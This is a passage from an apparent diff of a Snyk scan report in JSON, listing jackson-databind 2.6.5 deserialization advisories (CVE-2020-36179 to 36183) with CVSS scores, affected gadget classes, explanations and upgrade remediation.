Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting 